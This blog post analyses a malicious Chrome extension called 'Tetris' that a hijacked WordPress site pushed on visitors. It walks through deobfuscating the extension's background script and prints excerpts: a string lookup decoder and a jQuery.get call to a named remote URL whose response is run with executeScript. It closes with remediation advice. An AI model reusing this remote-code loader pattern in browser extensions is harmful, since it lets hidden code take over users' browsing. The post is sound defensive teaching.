Today I came across a website with a sadly familiar problem. It had been attacked for malvertising. The curious thing is that the attacker has successfully hijacked the site so it redirects (sometimes) to a site that tries to “convince” you to install a Chrome extension that asks for permission to modify the content of all the sites that you visit. This is the analysis of the problem.
What is the Software underneath
First of all, I checked what software was underneath the page, so the first thing to do was to open the source code. Seeing this was enough to realize that it was a WordPress installation. The site is deleted to avoid being an asshole.
<!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/ Served from: {SITE REDACTED} @ 2017-05-15 14:23:41 by W3 Total Cache -->W3 Total Cache is a very common plugin that allows WordPress to keep a cache to serve pages faster, especially static ones. So we now know the software behind this.
It does not show again
When I try to access the site again, it does not try to force me to download the malvertising Chrome extension again. How is this possible? I suspect immediately that it creates a cookie to know when is the last time the browser visited the site, so I use my beloved EditThisCookie extension to see what happens. I delete all the cookies related to the site and here it goes, the redirection again!
Right now, this is enough. It is common to not to redirect all the time to minimize the probabilities of being “caught”.
The redirection
When the cookie is not present, the site redirects to a page. The page looks something like this:
The page is pure gold: annoying sounds, images that look like pop-ups… everything to make you click where you don’t want to click. The most curious thing that happens on this page is that they promise you an extension to get rid of advertisements. Oh, the irony.
Something to notice is that the grammar in the English written on that page is totally broken, most likely produced with an automated translator. A simple WHOIS check tells me that the domain owner is Anatoliu Golovin. By the name, you can already make some conclusions. The WHOIS database is not totally reliable, but this can give already a hint: the person who runs the scheme is pretty lazy (he did not even took care of hiding his own name, even though you can do it by services like WhoisGuard). An extra DNS check tells me that the page is served from the USA (which does not really matter so much anyways).
The extension
The extension that the guy is trying to make you install is called “Tetris” and it is associated directly with the domain. It can be found here (don’t install unless you are a masochist). As of the evening of the 15th of May 2017, it has 297 active users and 0 ratings.
I use the free service of Chrome Extension Downloader in order to get the CRX package that would eventually download the extension without actually installing it, and proceed to analyze it.
Analysis
First of all, remember that the CRX file is nothing more than a ZIP with a specific structure, so we decompress it. The first thing to look at is the “manifest.json”, which basically will tell us the structure, what gets executed and the permissions needed. It requires basically permissions to read and modify every webpage that you visit.
There are two javascript files. On a first impression, script.js seems to be a harmless game, but there is an obfuscated section on the file js/background.js that catches my attention. First, because it is the only obfuscated part (the guy is lazy, remember) and second, because it contains weird strings composed out of lookup tables. This makes me immediately suspicious. The beautified obfuscated javascript is on a public gist here (done with the help of JSBeautifier.org).
Let’s proceed to “deobfuscate” the strings. For this, we use the Chrome Javascript console on an incognito window. For some reason, this looks like the function that carries on with bringing the strings back to life. Note the clever usage of the “b-a-d” combination of letters.
function GGamePlayerInTetris(a) {
for (var b = ["a", "b", "c", "d", "e", "f", "g", ":", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "/", "r", "s", "t", "u", "v", "w", "x", ".", "y", "z", "S", "1"], c = "", d = 0; d < a.length; d++) c += b[a[d]];
return c
}
This is called on another piece of code, in which:
var a = [21, 0, 1, 20];
By executing that function with that parameter, we obtain the string “tabs”. So far, seems promising. This call is made from this function:
function vGamePlayerInTetris() {
var a = function() {
return "chrome"
},
b = [21, 0, 1, 20];
return window[a()][GGamePlayerInTetris(b)]
}
This would be equivalent to this
function vGamePlayerInTetris() {
return window["chrome"]["tabs"];
}
And so it is changed. The same is done with the rest of the suspicious strings. While analyzing the (apparent) malware extension, I found that it requests this URL, which was obfuscated, through an HTTP/GET.
jQuery.get("https://mould1.us/moul/tetrisgameplayaer.php", function(a) {...}
It stores the contents of the request on the browser’s local storage for persistence and executes it through a call to “executeScript”. Sadly, when I tried to get the contents of the request it was gone for good, returning 404. Most likely because the guy noticed that he was spending on the “campaign” more money of what he was earning or because of it getting put down by some malware fighter. The domain was, nonetheless, registered using the same name as the main one. Anyways, the analysis has to stop here (which is good news).
How this happens?
The cause, most likely, is a non-strong WordPress admin password, bruteforced through an XML-RPC Amplified Bruteforce attack or the compromise of the whole server (more unlikely).
The solution
The solution goes through analyzing which files of the WordPress installation have been modified (usually there are mass-modifications and restoring all the files from a backup is usually the easiest, safest and fastest option), restoring the database from a proper backup if there is some modification (I would do it anyways), changing the admin password for one with proper strength and apply some measures to restrict the requests to the XML-RPC implementation that is inside WordPress, being careful of not compromising the functionality of any of the plugins (maybe the easiest method is by installing the official Jetpack plugin by WordPress.org, which offers this protection).
Conclusions
Even though this analysis was very incomplete (due to the impossibility to access the main script file) I hope this has helped you to understand the basic steps to carry on one of these kinds of malware analysis. Be aware that the Chrome Extension Store is full of this kind of crap and the automatic analysis done to the extensions before accepting them on the store very rarely detects this kind of danger. Overall, I hope you have learned something.